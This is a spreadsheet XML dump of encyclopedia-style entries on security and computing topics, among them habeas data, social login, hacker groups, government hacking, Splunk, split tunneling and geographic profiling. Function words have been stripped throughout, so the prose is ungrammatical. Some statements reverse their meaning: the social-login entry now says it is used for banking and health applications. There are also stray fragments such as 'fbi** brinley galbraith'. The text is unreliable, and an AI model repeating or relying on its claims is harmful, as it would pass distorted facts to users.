stipulates that: “habeas data shall granted: ensure knowledge information related person petitioner, contained records databanks government agencies agencies public character; correction data, petitioner prefer confidential process, either judicial administrative”. paraguay: 1992 paraguay constitution follows example brazil, enhances protection several ways. article paraguayan constitution states: “everyone access information data available assets official private registries public nature. also entitled know information used purpose. request competent judge order updating, rectification, destruction entries wrong illegitimately affecting rights.” argentina: argentinian version habeas data complete date. article constitution, amended 1994, states that: “any person shall file action obtain information data purpose, registered public records data bases, private ones intended supply information; case false data discrimination, action filed request suppression, rectification, confidentiality updating said data. secret nature sources journalistic information shall impaired.” philippines: august 2007, chief justice reynato puno announced supreme court philippines drafting writ habeas data. remedy supposed compel military government agents release information desaparecidos enable access military police files. reynato puno previously announced draft writ amparo, spanish protection, prevent military officials judicial proceedings simply denying cases disappearances extrajudicial killings. alternative definitions according josiah wolfson, "habeas data" also translated defined "you [the data subject] data." also habeas corpus information privacy privacy privacy references external links habeasdata.org data colombia latin american data protection review revista latinoamericana proteccion datos personales data privacy laws blog (data protection latin america)</t>
  </si>
  <si>
    <t>Social login</t>
  </si>
  <si>
    <t>social login form single sign-on using existing information social networking service facebook, twitter google, sign third party website instead creating login account specifically website. designed simplify logins users well provide reliable demographic information developers. social login works social login links accounts social networking services website, typically using either plug-in widget. selecting desired social networking service, user simply uses login service sign website. this, turn, negates need user remember login information multiple electronic commerce websites providing site owners uniform demographic information provided social networking service. many sites offer social login also offer traditional online registration either desire account compatible social networking service (and therefore would precluded creating account website). application social login implemented strictly authentication system using standards openid saml. consumer websites offer social functionality users, social login often implemented using oauth standard. oauth secure authorization protocol commonly used conjunction authentication grant party applications "session token" allowing make calls providers user's behalf. sites using social login manner typically offer social features commenting, sharing, reactions gamification. while social login extended corporate websites, majority social networks consumer-based identity providers allow self-asserted identities. reason, social login generally used strict, highly secure applications banking health. advantages social login studies shown website registration forms inefficient many people provide false data, forget login information site simply decline register first place. study conducted 2011 janrain blue research found percent consumers favored social login means authentication traditional online registration methods. additional benefits: targeted content sites obtain profile social graph data order target personalized content user. this includes information name, email, hometown, interests, activities, friends. however, create issues privacy, result narrowing variety views options available internet. multiple identities users websites multiple social identities allowing better control online identity. registration data many websites profile data returned social login instead users manually enter (personally identifiable information) forms. this potentially speed registration sign-up process. pre-validated email identity providers support email google yahoo! return user's email address party website preventing user supplying fabricated email address registration process. account linking because social login used authentication, many websites allow legacy users link pre-existing site account social login account without forcing re-registration. disadvantages social login utilizing social login platforms facebook unintentionally render third-party websites useless within certain libraries, schools, workplaces block social networking services productivity reasons. also cause difficulties countries active censorship regimes, china "golden shield project," third party website actively censored, effectively blocked user's social login blocked.there several risks come using social login tools. these logins also frontier fraud account abuse attackers sophisticated means hack authentication mechanisms. this result unwanted increase fraudulent account creations, worse; attackers successfully stealing social media account credentials legitimate users. social media accounts exploited users enticed download malicious browser extensions request read write permissions websites. these users aware later typically week installed, extensions download background javascript malware command control site user's browser. from malware infected browsers effectively controlled remotely. these extensions wait user logs social media another online account, using tokens credentials sign online accounts without rightful user's express permission. aggregating social login social login applications compatible many social networking services available developers using blogging platforms wordpress. companies gigya, janrain, oneall.com, lanoba.com, loginradius also provide single solution social login services developers. these companies provide social login access social network sites. security march 2012, research paper reported extensive study security social login mechanisms. authors found serious logic flaws high-profile providers relying party websites, openid (including google paypal access), facebook, janrain, freelancer, farmville, sears.com, etc. because researchers informed providers third party websites relied service prior public announcement discovery flaws, vulnerabilities corrected, security breaches reported. this research concludes overall security quality deployments seems worrisome. moreover, social logins often implemented insecure way. users, case, trust every application implemented feature handle identifier confidentially. furthermore, placing reliance account operable many websites, social login creates single point failure, thus considerably augmenting damage would caused account hacked. list notable providers here list services (commonly social networks) provide social login features encourage websites use. alipay apple facebook google kakaotalk line linkedin paypal sina weibo taobao vkontakte (вконтакте) twitter wechat yahoo! also single sign-on authentication authorization references further reading "social sign-on: what does benefit your site?" social technology review; january 2011 "the importance consumer identity" windows pro, 2/28/2011. "pepsi factor embrace gamification pepsi sound off" venturebeat; october 2011</t>
  </si>
  <si>
    <t>Hack Canada</t>
  </si>
  <si>
    <t>hack canada canadian organization hackers phreakers provides information mainly telephones, computer technology, legal issues related technology. founded 1998 cybørg/asm, hackcanada media publications many times, including wired news edmonton newspaper well regional newspapers) developments palm pilot boxing program. hackcanada also featured books hacking dummies (isbn 076455784x) steal this computer book. hackcanada also featured often hacker news network.on november 2017, almost twenty years registration, hackcanada.com domain went offline displays "this domain name expired" message. references external links official website</t>
  </si>
  <si>
    <t>Hack Club</t>
  </si>
  <si>
    <t>hack club global nonprofit network high school computer hackers, makers coders. founded 2014 zach latta, includes high school clubs 14,000 students. featured today show, profiled wall street journal many publications. programs hack club's primary focus clubs program, supports high school coding clubs learning resources mentorship. also runs series programs events. notable programs events are: hack club bank fiscal sponsorship program originally targeted high school hacker events flagship 2019 meetup high school hackathon organizers coding club leaders amas video calls industry experts elon musk, vitalik buterin summer making collaboration github, adafruit arduino create online summer program teenagers covid-19 pandemic included $50k hardware donations teen hackers around world hacker zephyr cross-country hackathon train across america funding hack club funded grants philanthropic organizations donations individual supporters. 2019, github education provided cash grants $500 every hack club "hackathon" event. 2020, github committed $50k hardware fund, globally alongside arduino adafruit, deliver hardware tools directly students’ homes program named hack club summer making. 2020, elon musk musk foundation donated $500,000 help expand hack club, donated another $1,000,000 2021. 2022, theresa preston-werner donated $500,000 hack club. references</t>
  </si>
  <si>
    <t>LOMAC</t>
  </si>
  <si>
    <t>water-mark mandatory access control (lomac) mandatory access control model protects integrity system objects subjects means information flow policy coupled subject demotion floating labels. lomac, system subjects objects assigned integrity labels, made hierarchical grades, depending types. together, label elements permit labels placed partial order, information flow protections demotion decisions based dominance operator describing order. implementations freebsd, biba model implemented mac_lomac policy. linux, project attempts implement lomac policy. also multi-level security mandatory access control discretionary access control take-grant model clark-wilson integrity model graham-denning model security modes operation references security engineering, ross anderson (isbn 0-471-38922-6) external links lomac project "lomac". freecode.</t>
  </si>
  <si>
    <t>Hack trapper</t>
  </si>
  <si>
    <t>Hack.lu</t>
  </si>
  <si>
    <t>hack.lu (also written hacklu) yearly computer security conference held luxembourg brings together variety people interested information security. it's organized computer incident response center luxembourg (circl), country's cert private sector, communes non-governmental entities. history first conference organized 2005 held 10th edition 2014. scope european information security conferences, hack.lu oldest conferences running. content organisation where conferences often provide day-long training sessions, hack.lu chooses different model filling first days workshops, enforcing strong focus practical things. convention make bridge various actors computer security world, discussing presenting topics like computer security, privacy, information technology cultural/technical implication society. since first conference capture flag event organized. recent years fluxfingers ruhr-university bochum event organizers, time 2014. event usually lasts possibility participate remotely. teams person physically present able claim prize. more people participated 2013. references external links hack.lu official website</t>
  </si>
  <si>
    <t>Government hacking</t>
  </si>
  <si>
    <t>government hacking permits exploitation vulnerabilities electronic products, especially software, gain remote access information interest. this information allows government investigators monitor user activity interfere device operation. government attacks security include malware encryption backdoors. national security agency's prism program ethiopia's finspy notable examples. hackers security hackers extensive knowledge technology (particularly electronic devices computer programs networks), knowledge illegal unethical purposes. hackers take advantage vulnerabilities software systems; hacking consists manipulating computer systems electronic devices remotely control machine access stored data.due technologies, necessary update cryptographic algorithms. this need raised level complexity techniques used encrypting data individuals guarantee network security. because difficulty deciphering data, government agencies begun search ways conduct criminal investigations; option hacking.since government hacking characterized technology obtain information citizens' devices, government agents could also manipulate device data insert data. addition manipulating data individuals, tools developed government could used criminals.fbi** brinley galbraith cyberwarfare hacking actions exploit capabilities electronic devices. cyberwarfare practices defense political, socio-environmental, socio-technological cultural causes waged cyberspace (particularly internet). intergovernmental cyberwarfare consciously defined, orderly action government attack another government, focusing country's resources, systems organizations. cyberattack, thought joint us-israeli operation, made iran's nuclear power plants 2010. attack made stuxnet, computer worm targets microsoft windows systems siemens devices. types government attacks security several methods. malware this technique sends malware internet search computers remotely, usually information transmitted stored) anonymous target computers. malware control computer's operating system, giving investigators great power. according attorney educator jennifer granick, courts restrict government malware uncontrollable distribution. stockpiling exploiting vulnerabilities government find system vulnerabilities investigative purposes. vulnerability action process (vep), system-vulnerability policy, created allow government decide whether disclose information security vulnerabilities. policy require disclosure security breaches technology vendors, discussion leading decision open public. backdoors because complexity encryption, governments attempt unravel defeat security features obtain data. encryption backdoors allow strongest encryption ignored. malicious hacking government hack computers remotely, whether authorized court. meet needs, agents copy, modify, delete, create data. with inadequate oversight judicial system, practice occurs stealthily creation warrants; possible deny sharing malware details defendants trial. harms from moment government allows hacking investigations reasons state, positive negative impacts possible; number harms occur. property generally, hackers damage devices software limit operation; data devices involved attack lost. replacing devices efforts recover data also costly, increasing financial damage. reputation hackers also harm target's image, specifically generally. reputation individual placed risk number reasons; person innocent hypothesized target attack. cases, individual cannot perceive attacked risks involved improper security practices. digital security government operations internet assist certain operations reduce digital security. other users also vulnerable black-market actors, could introduce viruses software updates create maintain) hardware. loss confidence internet could affect communications economy. criminal cases technological innovations, government focused research techniques; examples include hackers malware software deployment. diversified methods infiltrate monitor others, especially target irregular activity computer network investigation must remote. federal bureau investigation uses network investigative techniques (nits). government increasingly used hacking investigative technique. since 2002, used malware virtual criminal investigations. main research targets early nits individual computers. since developed form hacking attacks millions computers operation. technique encouraged privacy technologies ensure users identity, activities, hidden. malware installed government identify targets tools hide address, location identity. best-known legitimate form government hacking watering hole attack, government takes control criminal-activity site distributes virus computers access site. malware installed link clicked user access site. user aware infection machine; malware partially controls searches identifying information sends source. deploy malware, requires authorization uses search warrants issued magistrates accordance rule federal rules criminal procedure. according court transcript, operation affected 8,000 computers countries.in case demonstrated technology government, obtained access server north carolina stored photos videos child victims sexual abuse shared website accessed thousands users. instead shutting site, bureau controlled days create hundreds criminal cases. according fbi, action justified arrest hundreds alleged pedophiles. other examples national security agency former national security agency agent edward snowden announced june 2013 existence prism program, monitors internet. finspy ethiopia ethiopian government accused using finspy software obtain personal data ethiopian naturalized american citizen. kidane (the person's pseudonym) reportedly data skype calls, internet searches emails monitored software. also internet security cybercrime cyberativism hacker culture timeline global surveillance disclosures (2013–present) references</t>
  </si>
  <si>
    <t>Full disclosure (mailing list)</t>
  </si>
  <si>
    <t>full disclosure "lightly moderated" security mailing list generally used discussion information security disclosure vulnerabilities. list created july 2002 rose administered rose, later handed john cartwright. after rose shut netsys.com, list hosted sponsored secunia.the full disclosure mailing list originally created many people felt bugtraq mailing list "changed worse".in march 2014 cartwright shutdown original full-disclosure mailing list "unnamed" security researcher made requests large-scale deletion information threatened legal action. cartwright wrote list's homepage, always assumed turning point would sweeping request large-scale deletion information vendor taken exception never imagined request might come researcher within 'community' itself."on march 2014 list "rebooted" fyodor. site part seclists.org longer associated grok.org.uk. notable 0-days first disclosed full-disclosure references external links full disclosure mailing list archive</t>
  </si>
  <si>
    <t>Level Seven (hacker group)</t>
  </si>
  <si>
    <t>level seven crew, also known level seven, level hacking group late 1990s. rumoured dispersed early 2000 nominal head 'vent' raided february 2000. origins thought derived dante alighieri’s novel, inferno. group called level seven seventh level hell, violent. contained group’s defacements, quote: livello sette posidare vostra famiglia", loosely translated italian says, "level seven owns family". group, spent time efnet channel #levelseven discussing security, lack thereof. group also associated high-profile hacking groups global hell hacking girliez. notability hacking group noted attrition's active groups time claiming responsibility unauthorized penetrations computer systems 1999 alone, including first american national bank, federal geographic data committee, nasa sheraton hotels.level seven also credited first group hack domain server located morocco. server owned faculté sciences semlalia, marrakech however, group widely known september 1999 defacement (the embassy china's website), regards 1998 u.s. embassy bombings. level seven typify group hackers exploit attack computers networks thrill challenge, reasons money. during era, activists, used computer skills make political statements protest actions government industry. thus, bridged realms hacking activism, operating domain called "hacktivism". quotations would inclined think normal hackers would able break something like embassy. security measures very, different protecting commercial server." jonsten-bryden (british government security expert oceanus security suffolk) embrace technology, learn exploit technology powerful tool, knowledge, people beyond boundaries, testing limits, finding ways ideas... call people hackers, many.." vent, september 1999 references external links level seven. "complete list defacements". attrition. retrieved 2005-02-06. "hackers racist, anti-government slogans embassy site". insurgency internet. cnn. 1999-09-07. retrieved 2005-07-06. "embassy site hackers aimed show vulnerability". insurgency internet. cnn. 1999-09-08. archived original february 2003. retrieved 2005-07-06. will knight (1999-09-10). "embassy cracker playing government's game". response crackers invading embassy site: it's wants. zdnet retrieved 2006-03-05. level seven "going down" level seven interview level seven responds</t>
  </si>
  <si>
    <t>Secure Network</t>
  </si>
  <si>
    <t>secure network small offensive security security research company focusing information security based milano, italy. besides notability italy, received international exposure research project bluetooth security (co-sponsored f-secure) codenamed bluebag, also selected black briefings conference 2006 vegas.in 2009, also organized seacure.it, first international technical security conference ever held italy.secure network also offers internet security compliance consulting private companies. references</t>
  </si>
  <si>
    <t>Ganeti</t>
  </si>
  <si>
    <t>ganeti virtual machine cluster management tool originally developed google. solution stack uses either xen, kvm, virtualization platform, disk management, optionally drbd disk replication across physical hosts shared storage external replication. since 2007 ganeti developed released free open-source software. originally subject requirements general public license (gpl) version license changed 2-clause license version 2.11.6, released september 2014.ganeti acts convenient wrapper around existing hypervisors system administrators cluster. used google computing infrastructure also linux foundation (formerly open source development labs) hosting open source projects. contrast cloud solutions designed many ephemeral vms, ganeti focuses long-lived, persistent suitable workloads built-in redundancy. first international ganeti conference, ganeticon 2013 held greece till september 2013. second third held portland state university portland, september 2014) google prague prague, czech republic, september 2015). fourth conference took place google's dublin office, september 2016. fifth conference held leipzig december 2017 spreadshirt. also synnefo ovirt openqrm ceph proxmox references</t>
  </si>
  <si>
    <t>Ganymede (software)</t>
  </si>
  <si>
    <t>ganymede open source network directory management framework, designed allow administrator teams collaboratively manage subsets organization's directory services, nis, dns, active directory ldap, dhcp, radius, among others. first announced released 1998 usenix lisa conference, ganymede public development since then. ganymede uses central server supports clients connecting java rmi. ganymede server maintains transactional object graph database network information user objects, group objects, system objects, network objects, etc. users administrators ganymede clients (gui based) create, modify, delete objects database. whenever user commits transaction, ganymede server schedules number background threads write updated network source files whatever system scripts required propagate data managed network directory services. multiple users working concurrently, scheduler makes sure entire network environment updated transactionally consistent directory images builds finish ones issued. ganymede server meant programmed adopter, define arbitrary object data types along custom logic interact user maintain consistency within objects. adopters also create custom tasks executed specified times internal ganymede scheduler. such custom tasks make changes server's object database and/or external scripts update external services. ganymede elaborate data format used import export server's object database schema object data. importing typically result creation, modification, deletion database objects, trigger network directory service rebuilds using client would above all, ganymede designed around administration teams. administrators members 'owner groups', objects. object changed user automated task result change report email sent administrators appropriate owner group, making possible admins keep date changes others groups making. owner groups granted authority arbitrary subsets object database, making easy slice network directory space fashion desired. programmable framework, ganymede must programmed specific directory management tasks. fundamental generic networking germany used basis doctor project, used manage kaiserslautern university technology. references external links ganymede open ganymede github</t>
  </si>
  <si>
    <t>Secom</t>
  </si>
  <si>
    <t>secom co., ltd. security company japan. operations japan, united kingdom, australia, zealand, south korea, taiwan, china, thailand, vietnam, malaysia, singapore, indonesia, myanmar. history company founded 1962 operated name nippon keibi hosho 1983. initially offered security services patrolling services static guard services.in 1966, company developed japan’s first on-line security system. 1983, nippon keibi hosho adapted name secom, originally used brand name company. secom name "was coined contraction 'security' 'communication', concept brand build security system collaborating people science'”. references external links official website english) official website japanese) "security drone chases trespassers own". engadget. december 2015.</t>
  </si>
  <si>
    <t>Garda National Cyber Crime Bureau</t>
  </si>
  <si>
    <t>garda national cyber crime bureau branch garda síochána investigates computer crime, including providing digital forensics. history unit established 1991 part garda national economic crime bureau known cyber crime investigation unit. with growth computer crime commission future policing ireland report, unit re-established 2017. organisation unit divided computer forensics (cfe1) (cfe2), cybercrimes investigations unit, cyber intelligence unit, cyber security unit cyber safety unit.the unit headquarters harcourt square, dublin 2021 four hubs established cork, galway, mullingar wexford. responsibilities unit provides digital forensics capabilities examines digital media seized criminal investigations.it also trains people digital first responders work local district detective units.it investigates child exploitation cases tries identify makers child abuse material. cases park magic hack david young cloyne, county cork charged intentionally accessing information system without lawful authority reasonable excuse, intentionally hindering interrupting functioning information system vodafone ireland data centre clonshaugh business technology park, operating computer cork city intent make gain loss others also making demand menaces threatening release customer information. mother third person also charged. this followed two-year investigation bureau. detective garda paul fitzpatrick testified arrest, charge caution involved.in october 2021 david young pleaded guilty charges. ransomware attack after national cyber security centre restored health service executive computers, bureau began investigating case. references</t>
  </si>
  <si>
    <t>GateKeeper (access control device)</t>
  </si>
  <si>
    <t>gatekeeper wireless proximity-based access control authentication device allows user automatically lock computer walking away unlock walking back. gatekeeper consists (the device), dongle transmit wireless signal, software manage user credentials. device also functions password manager. gatekeeper software hardware gatekeeper software uses dashboard displays device's signal strength, allows users select configure lock settings, manage user credentials, range computer detects device's presence. gatekeeper software provides user options enable two-factor authentication (2-fa) computer access requiring user enter carry gatekeeper security token login. sensor ever removed computer, software immediately locks computer. gatekeeper enterprise gatekeeper enterprise software integrates gatekeeper hardware, allows administrator control deployment management gatekeepers network. administrator security policies, gather data auditing, conduct productivity analysis, deploy updates client software. also computer access control security information event management rfid wireless lock management computer security bluetooth token references external links official website</t>
  </si>
  <si>
    <t>Generally Accepted Privacy Principles</t>
  </si>
  <si>
    <t>generally accepted privacy principles (gapp) framework intended assist chartered accountants certified public accountants creating effective privacy program managing preventing privacy risks. framework developed joint consultation canadian institute chartered accountants (cica) american institute certified public accountants (aicpa) aicpa/cica privacy task force. component 2.the gapp framework previously known aicpa/cica privacy framework, founded single privacy principle: personally identifiable information must collected, used, retained disclosed compliance commitments entity's privacy notice criteria gapp issued aicpa/cica. this privacy objective supported main principles seventy objectives, associated measurable criteria. principles are: management notice choice consent collection use, retention disposal access disclosure third parties security privacy quality monitoring enforcementprivacy defined generally accepted privacy principles "the rights obligations individuals organizations respect collection, use, retention, disclosure, disposal personal information." also right privacy references external links fill gapp, magazine, 2007 review critique gapp, society information risk analysts 2014 gapp targets privacy risks, journal accountancy comparison eight governance risk control (grc) regulatory compliances</t>
  </si>
  <si>
    <t>Splunk</t>
  </si>
  <si>
    <t>splunk inc. american software company based francisco, california, produces software searching, monitoring, analyzing machine-generated data web-style interface.its software helps capture, index correlate real-time data searchable repository, generate graphs, reports, alerts, dashboards visualizations. splunk uses machine data identifying data patterns, providing metrics, diagnosing problems providing intelligence business operations. splunk horizontal technology used application management, security compliance, well business analytics. history founding early years michael baum, erik swan co-founded splunk 2003. venture firms august capital, sevin rosen, ignition partners jk&amp;b capital backed company. 2007 splunk raised us$40 million. became profitable 2009. 2012 splunk initial public offering, trading nasdaq symbol splk. company growth september 2013 company acquired bugsense, mobile-device data-analytics company. bugsense provides mobile analytics platform used developers improve performance improve quality". supplied "software developer kit" give developers access data analytics mobile devices managed scalable cloud platform. acquisition amount undisclosed. december 2013, splunk acquired cloudmeter, provider network data capture technologies.in june 2015, splunk acquired software company metafor uses machine learning technology analyze data generated infrastructure applications.in july 2015 splunk acquired caspida, cybersecurity startup, us$190 million.in october 2015 splunk sealed "cybersecurity alliance" u.s. government security contractor booz allen hamilton inc. offer combined cyberthreat detection intelligence-analysis technology.in 2016, splunk pledged donate $100 million software licenses, training, support, education, volunteerism nonprofits schools 10-year period.according glassdoor, fourth highest-paying company employees united states april 2017. 2017, splunk acquired drastin, software company provides search-based analytics enterprises.in september 2017, splunk acquired signalsense developed cloud-based data collection breach detection software. splunk announced using machine learning time.in october 2017, splunk acquired technology intellectual property smaller rival rocana.on april 2018, splunk acquired phantom cyber corporation approximately us$350 million. april 2018, reached us$14.8 billion market capitalization.on june 2018, splunk announced acquisition victorops, devops incident management startup, us$120 million.in july 2018 splunk acquired kryptoncloud, industrial analytics saas company. splunk acquired cloud monitoring company, signalfx, october 2019 $1.05 billion. weeks later september 2019, splunk acquired omnition—an early-stage startup specializing distributed tracing—for undisclosed amount.splunk also announced launch corporate venture fund, splunk ventures—a $100 million innovation fund million social impact fund invest early-stage startups. recent history 2020, splunk named fortune 1000 list.as september 2020, splunk's client list includes companies fortune list.splunk recognized leader 2020 gartner magic quadrant siem. gartner report evaluates siem providers, provides graph (the magic quadrant) vendors plotted based ability execute (the y-axis) completeness vision (the x-axis). splunk noted analytics infrastructure monitoring, ability scale index original, data, infosec functions, multiple deployment options.splunk reported fiscal 2021 fourth quarter revenue $745.1 million. fiscal 2021 splunk reported revenue $2.23 billion.on november 2021, douglas merritt stepped president ceo. graham smith, splunk's chairman since 2019, took interim ceo.on march 2022, splunk named gary steele, previously proofpoint, successor interim chief graham smith effective april, 2022. products splunk's core offering collects analyzes high volumes machine-generated data. uses application programming interface (api) connect applications devices. developed data reporting executives outside company's department.splunk enterprise security (es) provides security information event management (siem) machine data generated security technologies network, endpoint, access, malware, vulnerability identity information. premium application licensed independently. 2011, splunk released splunk storm, cloud-based version core splunk product. splunk storm offered turnkey, managed hosted service machine data. 2013, splunk announced splunk storm would become completely free service expanded cloud offering splunk cloud. 2015, splunk shut splunk storm.in 2013, splunk announced product called hunk: splunk analytics hadoop, supports accessing, searching, reporting external data sets located hadoop splunk interface.in 2015, splunk announced light version core splunk product, aimed smaller it-environments mid-sized enterprises. splunk debuted splunk service intelligence (itsi) september 2015. itsi leverages splunk data provide visibility performance. software analytics detect anomalies determine causes areas affects. cloud transformation 2016, google announced cloud platform would integrate splunk expand areas like ops, security, compliance. company also announced additional machine learning capabilities several major product offerings, installed platform. splunk cloud received fedramp authorization general services administration fedramp program management office moderate level 2019, enabling splunk sell federal government. this allows customers access google's services power data splunk. also, integrating google anthos google cloud security command center, splunk data shared among different cloud-based applications. help companies manage shift multi cloud environment, splunk launched observability cloud, combines infrastructure monitoring, application performance monitoring, digital experience monitoring, investigation, incident response capabilities. 2020, company announced splunk cloud available google cloud platform launched initiative amazon services help customers migrate on-premises splunk workloads splunk cloud cloud.in 2017, splunk introduced splunk insights ransomware, analytics tool assessing investigating potential threats ingesting event logs multiple sources. software targeted toward smaller organizations like universities. company also launched splunk insights cloud monitoring, service facilitate enterprises' migration amazon services' cloud.in 2018, splunk introduced splunk industrial asset intelligence, extracts information iiot(industrial internet things) data various resources presents users critical alerts.in 2019, splunk announced capabilities platform including general availability data fabric search data stream processor. data fabric search uses datasets across different data stores, including splunk-based, single view. required data structure created query run.data stream processor real-time processing product collects data various sources distributes results splunk destinations. allows role-based access create alerts reports based data relevant individual. 2020, updated allow access, process, route real-time data multiple cloud services. also 2019, splunk rolled splunk connected experiences, extends data processing analytics capabilities augmented reality (ar), mobile devices, mobile applications.in 2020, splunk announced splunk enterprise splunk cloud edition. they include stream processing, machine learning, multi-cloud capabilities.in october 2019, splunk announced integration security tools including security information event management (siem), user behavior analytics (uba), security orchestration, automation, response (splunk phantom) splunk mission control.in 2019, splunk introduced application performance monitoring (apm) platform, signalfx microservices apm, pairs “no-sample’ monitoring analysis features omnition's full-fidelity tracing capabilities. splunk also announced capability called kubernetes navigator would available product, signalfx infrastructure monitoring. splunkbase splunkbase community hosted splunk users find apps add-ons splunk improve functionality usefulness splunk, well provide quick easy interface specific use-cases and/or vendor products. october 2019, 2,000 apps available framework.integrations splunkbase include splunk relic, forescout extended module splunk, splunk aws. sponsorships mclaren starting 2020 splunk announced partnership mclaren formula team, sponsoring team working provide data analysis insight racing performance.splunk worked mclaren racing several years, evaluating performance data pulled nearly sensors every racecar, becoming mclaren's official technology partner february 2020. partnership resulted splunk deployed across mclaren group. this included using splunk interpret data mclaren's e-sports team. part partnership, splunk's logo added sidepod cockpit surrounds mcl35 racecar. trek-segafredo november 2018, splunk signed sponsorship deal trek-segafredo professional road cycling team; partnership started 2019. splunk replaced industries company's technology partner. splunk provides data analysis company, including analysis riders, coaches, mechanics. team jerseys, bikes, vehicles carry splunk branding. splunk also participates trek's race hospitality program. references external links official website business data splunk inc.:</t>
  </si>
  <si>
    <t>Ganeti Web Manager</t>
  </si>
  <si>
    <t>ganeti manager web-based management interface ganeti solution stack virtual machine clusters. 2010 project development open source uses ganeti hosting open source software projects phpbb well supercell project provides on-demand virtual machines software testing. ganeti manager free open-source software, subject requirements general public license (gpl), version references</t>
  </si>
  <si>
    <t>Split tunneling</t>
  </si>
  <si>
    <t>split tunneling computer networking concept allows user access dissimilar security domains like public network (e.g., internet) local area network wide area network time, using different network connections. this connection state usually facilitated simultaneous network interface controller (nic), radio nic, wireless (wlan) nic, client software application without benefit access control. example, suppose user utilizes remote access software client connecting campus network using hotel wireless network. user split tunneling enabled able connect file servers, database servers, mail servers servers corporate network connection. when user connects internet resources (websites, sites, etc.), connection request goes directly gateway provided hotel network. however, every allows split tunneling. some vpns split tunneling include private internet access (pia), expressvpn, surfshark.split tunneling sometimes categorized based configured. split tunnel configured tunnel traffic destined specific destinations called split-include tunnel. when configured accept traffic except traffic destined specific destinations, called split-exclude tunnel. advantages advantage using split tunneling alleviates bottlenecks conserves bandwidth internet traffic pass server. another advantage case user works supplier partner site needs access network resources networks. split tunneling prevents user continually connect disconnect. disadvantages disadvantage split tunneling enabled, users bypass gateway level security might place within company infrastructure. example, content filtering place, something usually controlled gateway level, client isps implement hijacking break name resolution private addresses split tunnel. variants related technology inverse split tunneling variant split tunneling called "inverse" split tunneling. default datagrams enter tunnel except destination explicitly allowed gateway. criteria allowing datagrams exit local network interface (outside tunnel) vary vendor vendor (i.e.: port, service, etc.) this keeps control network gateways centralized policy device terminator. this augmented endpoint policy enforcement technologies interface firewall endpoint device's network interface driver, group policy object anti-malware agent. this related many ways network access control (nac). dynamic split tunneling form split-tunneling derives addresses include/exclude runtime-based list hostname rules/policies. [dynamic split tunneling] (dst) ipv6 dual-stack networking internal ipv6 content hosted presented sites unique local address range level, external ipv4 ipv6 content accessed site routers. references further reading juniper(r) networks secure access configuration guide, cameron, neil wyler, 2011, isbn 9780080556635, citrix access suite advanced concepts: official guide, 2/e, steve kaplan, andy jones, 2006, isbn 9780071501743, mcgraw-hill education microsoft forefront 2010 administrator's handbook, erez ben-ari, dolev, 2011, isbn 9781849681636, packt publishing cisco configuration richard deal, 2009, page 413, isbn 9780071622684 mcgraw-hill education external links split tunneling linux</t>
  </si>
  <si>
    <t>Geographic profiling</t>
  </si>
  <si>
    <t>geographic profiling criminal investigative methodology analyzes locations connected series crimes determine probable area offender residence. incorporating qualitative quantitative methods, assists understanding spatial behaviour offender focusing investigation smaller area community. typically used cases serial murder rape (but also arson, bombing, robbery, terrorism crimes), technique helps police detectives prioritize information large-scale major crime investigations often involve hundreds thousands suspects tips. addition determining offender's likely area residence, understanding spatial pattern crime series characteristics crime sites tell investigators useful information, whether crime opportunistic degree offender familiarity crime location. this based connection offender's behavior non-criminal life.geographic profiling growing popularity and, combined offender profiling, helpful tool investigation serial crime. development while spatial analysis methods police investigations goes back many years (e.g., detectives gathered around large city pins stuck it), formalized process known today geographic profiling originated research conducted simon fraser university's school criminology british columbia, canada, 1989.geographic profiling model based assumption offenders likely select victims commit crime would centered near home address. technique spread several u.s., canadian, british, european enforcement agencies. originally designed violent crime investigations, increasingly used property crime. through numerous research studies, increased importance placed journeys offenders habitually take determine spatial range criminal activity. these areas become comfort zone predatory offenders commit crime familiarity. consequently, criminal acts follow distance-decay function, away regular activity space offender less likely person engage predatory criminal activity. however, also buffer zone offender avoid committing crimes close homes likely event identified neighbour. central concepts theoretical foundation geographic profiling environmental criminology. concepts include: journey-to-crimesupports notion crimes likely occur closer offender’s home follow distance-decay function (ddf) crimes less likely occur away offender home base. concerned ‘distance crime’ offenders general travel limited distances commit crimes.routine activity theoryoriginally developed cohen felson (1979), primary principle offender victim must intersect time space crime occur. this approach focuses concept crime occurs opportunity taken within parties’ non-criminal spatial activity. activity space consist regular areas offender travels work, school, home recreational areas.rational choice theoryconcepts relating explanation spatial behaviour include least-effort principle offenders likely first opportunity idea buffer zone. exhibits constant tension offender’s desire divert attention home base desire travel necessary commit crimes.crime pattern theorydeveloped canadian environmental criminologists paul patricia brantingham, theory exerts strongest influence geographic profiling. suggests crime sites opportunities random. there emphasis interaction offender’s mental spatial surroundings allotment victims (target backcloth).furthermore, serial crimes easiest develop geographic profiles, since crime contains spatial information provides additional data including fact crime area tends enlarge increase comfort confidence. initial hunt criminal acts likely occur relatively close location offender's home workplace. success rate increases, burgeoning sense confidence seek prey home travel greater distance. crimes suitable analysis predatory nature exercises spatial decision-making process area hunting targets, travel routes, mode transportation even body dump sites.another leading researcher area david canter whose approach geographic profiling detailed around circle theory environmental range. 1993, canter larkin developed models offender behaviour: marauder commuter models. distinction marauders operate area close proximity offender's home base commuters commit crimes outside habitual zone. hopes differentiate types serial offenders studying relationship criminal spatial behaviour offender's place residence. considerations developing geographic profile, important factors consider: crime locationsa crime contain evidence. evidence found location provides information leading offender victim's prior location, clues gone, well information depicting happened. collecting comparing clues numerous crime locations influences development offender's patterns. offender typeaccording rossmo four different types offenders regard geographic profiling. hunter: hunter singles specific victim without leaving home territory. commit crimes lives. poacher: poacher travel home territory hunting. troller: troller realize opportunistic encounter occupied activities strike. trapper: trapper draw victim using different seemingly harmless situations. hunting methodshunting process broken parts. search suitable victim, method attack. target backcloth (the spatial opportunity structure crime sites)“target victim backcloth important understanding geometric arrangement crime sites; equivalent spatial opportunity structure (brantingham brantingham, 1993b). configured geographic temporal distribution “suitable” seen offenders perspective) crime targets victims across physical landscape. availability particular targets vary significantly according neighborhood, area, even city, influenced time, week, season; hence, term structural backcloth also used.” arterial roads highwayslarge roads highways play huge part crime strictly criminals victims forced travel. crimes often cluster around freeway exits entrances. stops train stationsthese forms rapid transportation also used offenders victims spots certain areas. physical psychological boundariesoffender victim alike restrained physical boundaries rivers, lakes, oceans highways. psychological boundaries also affect movement, example black offender travel white neighborhood fear identified. land neighbourhood demographicscertain offenders prefer certain ethnicity victim, hunt different neighborhoods affecting spatial crime patterns. routine activities victimsunderstanding routine victim provide insight offender searches victims. singularities displacementincorporating factors profile lead geographic pattern sheds light offender's mobility, method transportation, ability navigate boundaries importantly, possible residential location. important recognize spatial intentionality, determine offender's comfort zone desire commit crimes locations feel sense familiarity. however, 